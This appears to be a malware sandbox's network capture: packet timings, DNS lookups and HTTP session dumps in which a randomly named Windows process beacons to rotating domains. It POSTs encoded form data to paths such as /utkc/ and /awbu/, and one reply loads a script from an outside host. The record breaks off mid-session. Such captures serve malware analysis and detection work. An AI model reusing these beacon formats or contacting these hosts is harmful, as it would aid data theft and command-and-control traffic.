                                            Jul 3, 2024 18:54:23.437920094 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.457354069 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.462722063 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:24.465607882 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.469583988 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:24.475313902 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:25.381266117 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:25.381289005 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:25.381428957 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:25.384943008 CEST4975380192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:25.389818907 CEST804975323.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:38.801609993 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:38.807297945 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:38.807372093 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:38.809283018 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:38.815323114 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:39.578632116 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:39.580806971 CEST8049754185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:39.580868959 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:40.315351963 CEST4975480192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.331799030 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.336735010 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:41.336797953 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.338901043 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:41.343703985 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:42.132993937 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:42.133018017 CEST8049755185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:42.133167028 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:42.844130039 CEST4975580192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.862538099 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.867413998 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:43.869498014 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.873456001 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:43.878297091 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:43.878345966 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:44.660573959 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:44.660593033 CEST8049756185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:44.660650969 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:45.375360012 CEST4975680192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.393785954 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.399621964 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:46.401809931 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.405517101 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:46.410991907 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:47.172274113 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:47.172409058 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:47.172472954 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:47.175287962 CEST4975780192.168.2.6185.151.30.199
                                            Jul 3, 2024 18:54:47.180371046 CEST8049757185.151.30.199192.168.2.6
                                            Jul 3, 2024 18:54:52.389606953 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:52.394427061 CEST8049759142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:52.397938967 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:52.401451111 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:52.408220053 CEST8049759142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:53.154165983 CEST8049759142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:53.154268026 CEST8049759142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:53.154390097 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:53.906759024 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.925578117 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.931425095 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:54.931515932 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.933614016 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.938467026 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:55.659480095 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:55.660450935 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:55.660614967 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:56.439358950 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.457545042 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.462909937 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:57.462981939 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.465045929 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.469907045 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:57.470007896 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:58.193600893 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:58.193804026 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:58.193895102 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:58.969074965 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:59.987663984 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:59.992835999 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:59.993580103 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:59.995413065 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:55:00.000164986 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:55:00.746496916 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:55:00.747028112 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:55:00.747078896 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:55:00.749320984 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:55:00.754115105 CEST8049762142.250.185.83192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 3, 2024 18:52:30.990633011 CEST | 192.168.2.6 | 1.1.1.1 | 0xdfab | Standard query (0) | www.le-kuk.shop | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:52:46.737943888 CEST | 192.168.2.6 | 1.1.1.1 | 0xd666 | Standard query (0) | www.limpiezasbarcelo.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:00.128887892 CEST | 192.168.2.6 | 1.1.1.1 | 0xae22 | Standard query (0) | www.top65s.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:14.113137960 CEST | 192.168.2.6 | 1.1.1.1 | 0x5b80 | Standard query (0) | www.videos60.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:27.660072088 CEST | 192.168.2.6 | 1.1.1.1 | 0x1df2 | Standard query (0) | www.vertilehub.xyz | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:41.050534964 CEST | 192.168.2.6 | 1.1.1.1 | 0x5639 | Standard query (0) | www.theestrellastore.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:49.131145954 CEST | 192.168.2.6 | 1.1.1.1 | 0x5672 | Standard query (0) | www.xuzfceth.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:03.254476070 CEST | 192.168.2.6 | 1.1.1.1 | 0xe140 | Standard query (0) | www.hondamechanic.today | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:16.645191908 CEST | 192.168.2.6 | 1.1.1.1 | 0x8e7f | Standard query (0) | www.primefindsstore.shop | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:30.394635916 CEST | 192.168.2.6 | 1.1.1.1 | 0xdeec | Standard query (0) | www.ecurtiscustoms.com | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:38.676717043 CEST | 192.168.2.6 | 1.1.1.1 | 0x98ab | Standard query (0) | www.salecost.co.uk | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:52.193414927 CEST | 192.168.2.6 | 1.1.1.1 | 0x881c | Standard query (0) | www.bayviewcribbage.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 18:52:31.007452965 CEST | 1.1.1.1 | 192.168.2.6 | 0xdfab | No error (0) | www.le-kuk.shop | | 89.31.143.90 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:52:46.799369097 CEST | 1.1.1.1 | 192.168.2.6 | 0xd666 | No error (0) | www.limpiezasbarcelo.com | limpiezasbarcelo.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 18:52:46.799369097 CEST | 1.1.1.1 | 192.168.2.6 | 0xd666 | No error (0) | limpiezasbarcelo.com | | 81.88.48.71 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:00.701769114 CEST | 1.1.1.1 | 192.168.2.6 | 0xae22 | No error (0) | www.top65s.com | lcmoji.lc301adbt.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 18:53:00.701769114 CEST | 1.1.1.1 | 192.168.2.6 | 0xae22 | No error (0) | lcmoji.lc301adbt.com | | 156.251.142.107 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:00.701769114 CEST | 1.1.1.1 | 192.168.2.6 | 0xae22 | No error (0) | lcmoji.lc301adbt.com | | 156.251.142.108 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:00.701769114 CEST | 1.1.1.1 | 192.168.2.6 | 0xae22 | No error (0) | lcmoji.lc301adbt.com | | 156.251.142.105 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:00.701769114 CEST | 1.1.1.1 | 192.168.2.6 | 0xae22 | No error (0) | lcmoji.lc301adbt.com | | 156.251.142.106 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:14.196428061 CEST | 1.1.1.1 | 192.168.2.6 | 0x5b80 | No error (0) | www.videos60.com | onstatic-pt.setupdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 18:53:14.196428061 CEST | 1.1.1.1 | 192.168.2.6 | 0x5b80 | No error (0) | onstatic-pt.setupdns.net | | 81.88.57.70 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:27.801043987 CEST | 1.1.1.1 | 192.168.2.6 | 0x1df2 | No error (0) | www.vertilehub.xyz | | 203.161.49.220 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:41.063848972 CEST | 1.1.1.1 | 192.168.2.6 | 0x5639 | Name error (3) | www.theestrellastore.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:53:49.592504025 CEST | 1.1.1.1 | 192.168.2.6 | 0x5672 | No error (0) | www.xuzfceth.com | | 152.32.156.214 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:03.373831987 CEST | 1.1.1.1 | 192.168.2.6 | 0xe140 | No error (0) | www.hondamechanic.today | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:16.849212885 CEST | 1.1.1.1 | 192.168.2.6 | 0x8e7f | No error (0) | www.primefindsstore.shop | | 23.105.172.12 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:30.616265059 CEST | 1.1.1.1 | 192.168.2.6 | 0xdeec | Name error (3) | www.ecurtiscustoms.com | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:38.798491955 CEST | 1.1.1.1 | 192.168.2.6 | 0x98ab | No error (0) | www.salecost.co.uk | | 185.151.30.199 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 18:54:52.382961035 CEST | 1.1.1.1 | 192.168.2.6 | 0x881c | No error (0) | www.bayviewcribbage.com | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 18:54:52.382961035 CEST | 1.1.1.1 | 192.168.2.6 | 0x881c | No error (0) | ghs.googlehosted.com | | 142.250.185.83 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.6 | 49719 | 89.31.143.90 | 80
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:52:31.026048899 CEST | 477 | OUT | GET /obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.le-kuk.shop
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 18:52:31.684258938 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Date: Wed, 03 Jul 2024 16:52:31 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Server: UD Webspace 3.2
                                            Data Ascii: 19e0<!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,html{height:100%;margin:0;padding:0;background-color:#fff;font-family:Arial,Verdana,sans-serif}body{text-align:center;background-color:#f0f2f3}.spacerTop{margin-top:40px}a:focus,a:hover,a:link,a:visited{margin:0;padding:0;border:none}.dvLink:focus,.dvLink:hover,.dvLink:link,.dvLink:visited{background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAJCAYAAAARml2dAAAAHklEQVQImWNgqDzxn6HyxH8GDACToIckhYLIEmgAAAHCOEFxKWXwAAAAAElFTkSuQmCC') right center no-repeat;padding-right:12px;border:0 none;text-decoration:none;font-weight:400;color:#0079c8}.dvLink:hover{text-decoration:underline}.dvLink.no-ico{background:0 0;padding:0}.logo-wrapper{width:100%;background-color:#fff;padding:55px 0}#logo{margin:0 auto;width:600px;height:50px;background-position:left [TRUNCATED]
Jul 3, 2024 18:52:31.684350014 CEST | 1236 | IN
                                            Data Ascii: kground-size:contain,0 0;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUAAAAAyCAMAAAAa0/LmAAAARVBMVEUAAADw8vTf5/Dd3d3P2ujPz8+/zuHCwsKvwtmfttGxsbGPqsqampp/nsKMjIxni7d+fn5QeqxnZ2dAbqQwYp0XTpEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8
Jul 3, 2024 18:52:31.684400082 CEST | 448 | IN
                                            Data Ascii: n856miHNFgT0rZnOvE72osojy0FbKHfjcYRSoulzVbhzecPKLAntQ9lrgGkdUOSkoiOcC8bI7HqOzxEe7xlEg70P2L0A9uX55FBsSHovMxsrPBbJzex4bQZG/K1D9KHDYr7HnAnFy8Dl9DjHw4c7f0yi4HNeda9UlgSYOqFcCH5/a7u8KFE8EPp2BlpjYsYFMs8N0HwWup67jDDSfFViTDFYpZa4IBCJscyiuCQxYMp8WOP/47f
Jul 3, 2024 18:52:31.684416056 CEST | 1236 | IN
                                            Data Ascii: xPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA++RBgFAj9V2UEg8QSmeCaNZlyff643tidPIWcyGvQTfCCQ+FPrCwLdp/+nejItfookHCKSXIeYWhCDoOGfOoKpAUONxwaBoNQwR9fUc3bG2dTFMehwX7Xmle/GEU9ZPi+qUFs/SmrnOp/b29hwDK5BuDoQE1xkXh9+VDWx47Ng5+5YkytG/Py47ueqKM
Jul 3, 2024 18:52:31.684437037 CEST | 83 | IN
                                            Data Ascii: FTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,
Jul 3, 2024 18:52:31.684451103 CEST | 1236 | IN
                                            Data Ascii: 0);text-align:left}#logo img{border:none}.logo-href{display:block;width:320px;height:50px}.header-wrapper{width:100%;background-color:#3e6994}.header{margin:0 auto;width:600px;padding:38px 0;text-align:left;font-size:14px}.title{margin:0;font-
Jul 3, 2024 18:52:31.684464931 CEST | 1236 | IN
                                            Data Ascii: ten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem <a href="https://www.united-domains.de/login/"class="dvLink no-ico"rel="nofollow noopener">Domain-Portfolio</a> jederzeit selbst online konfigurieren (z.B. Web-Weiterleitu
Jul 3, 2024 18:52:31.684494972 CEST | 79 | IN
                                            Data Ascii: G. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49723 | 81.88.48.71 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:52:46.816431999 CEST | 754 | OUT | POST /utkc/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.limpiezasbarcelo.com
                                            Origin: http://www.limpiezasbarcelo.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.limpiezasbarcelo.com/utkc/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=8WKSZfXdpAc56sOwzd690F5ezQrp1w4MtkKtIZaynsb0gVglt8di+WisLJ+xkCrJU2Jk8MXKHSnFinJ5BWnMBVBwF4AJ+Z34Jg1hroIQY27MbA32WdlbOwYZVsPLMRnM03ooUKyTFKdCMrtIg3e/15PQhyKG8DGqTVf++zdP2MnvJ6njHbtjCyXkt5x3Cr1oKHiQEbs2kfmw
Jul 3, 2024 18:52:47.505155087 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:47 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49724 | 81.88.48.71 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:52:49.353669882 CEST | 778 | OUT | POST /utkc/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.limpiezasbarcelo.com
                                            Origin: http://www.limpiezasbarcelo.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.limpiezasbarcelo.com/utkc/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=8WKSZfXdpAc56N+w16W99F5d9wrp7Q4ItkOtIYvvn+/0gxklq9diuGisDp/1gCrOU21G8JvKHSDFilh5AnnPHFByNYAPw534Jg1hroc+Y2jMbUL2X8kNNwYeSsPLGxnA03oKUIG5FMBCMqdIhme8gpPStiLDs2rdR3j+1yVqnN3rMMm5botAQi3mt7pFCL1CIHaQWMgRrrDTbidC2B9StbD5FKG7rTF++Q==
Jul 3, 2024 18:52:50.020333052 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:49 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49726 | 81.88.48.71 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:52:51.886478901 CEST | 1791 | OUT | POST /utkc/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.limpiezasbarcelo.com
                                            Origin: http://www.limpiezasbarcelo.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.limpiezasbarcelo.com/utkc/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=8WKSZfXdpAc56N+w16W99F5d9wrp7Q4ItkOtIYvvn+30jCslqeFi8WisJJ/4gCqSUyhC8Jr8HQrFjEB5I1DPOFByPYAK+Z2gJjdlroM+Y2jMbVb2eNkNLwYZVsPfMRmd02MwULqDFaxCLKNIjUG8hJPcuiLls2vCRzCN1zRQnPrrNIqjJKsbKj7HzqdQAsVJIxi6SbUXgZu9Zn95w3gwjIL2OMTbqAgFs3ixpvOibLw0sx69D0UsjTHuJr0uxW0/DcXbrk/N3PcKoTwSTMc2hNhywvsnS3yuJtBvln2bk7K0uUgiq+rs6fhuwYBaGi581kZm2oOaViU58cdZ+4cw6zGralpEUpyIcZN/1V31BGguNyh3RTqOZ4Mo8advRHIoycAiVRgpwS1smTN5LFRsDS4UYD682z2KoxB9pO0gAmIbOD9F7A66agD3EI3hV9WmVDO7Evd+YzOMVa9LA3sZ9qLgUHQKkEqJs0pbB0rCZmmV/BFUCmPH3E1dzPr7CZYpKYyuudwSuHk8L4EH1mxzMfHMtyIsf56KMX40BzdapW81ujeW3OlNFMN323OZlCNq513LEYMGWyOV+zzOmDL5YMITLRa53wKuGxseLQ37IBpWWZlgcLkJ3ufdgSjE+oaLx3bgX5Cj8Vn/TRO8dmpOHzWAWCaKkMUMoUR8qKB9neHVpMgwfVStkL0h+DgWttd4LwVTUX1db+hmZAqjNtg9oyqoYSG40IfjTcp3Y3WGW/LCzaflEQS4Y3ff7cD9wKRffiE6A1+c5qHl/8tyjYj4yG9E4CsRd655MT6jNe94Z1AwcMG9vFUlhyMnY+N8y8bNN+LtuNAws7FezPM673IIBYfChVS3ClGoUTcXx9AWVxNG1ldz1v+q4Z1xQsuunT0C3j4ufNSwgprRVjFIKyYudc1WSzNthGDABZfTd/Zg7ZcsaLQAeVE1q0wzR98HcX9YEY0yCGYDE+9rV8i5CjmMGtWba+Pp4G9o4s7nBLjWiOouTf [TRUNCATED]
Jul 3, 2024 18:52:52.600522041 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:52 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49727 | 81.88.48.71 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:52:54.416510105 CEST | 486 | OUT | GET /utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.limpiezasbarcelo.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 18:52:55.116456985 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:55 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49728 | 156.251.142.107 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:53:00.711011887 CEST | 724 | OUT | POST /awbu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.top65s.com
                                            Origin: http://www.top65s.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.top65s.com/awbu/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=gdkuFrJBUYtk3h2rOY3GdYYojJrHGsvYylkJnLy69VAOszfHI7THN2bePa5UUDJZOH7eIj57kNa+mWXuBtgEm69K5Cdm8lSXUkzLupYnxQCNAmYN0PTbvaOP2r/ybJELddpvjeNxbHFkpRiaKrnAgzU+XqhOtrrhXlpUL7Pv+TK0K+3qNvaJUF8O/gJJSnIgJ8LuGtNpegZz
Jul 3, 2024 18:53:01.311511993 CEST | 192 | IN | HTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49729 | 156.251.142.107 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:53:03.258177042 CEST | 748 | OUT | POST /awbu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.top65s.com
                                            Origin: http://www.top65s.com
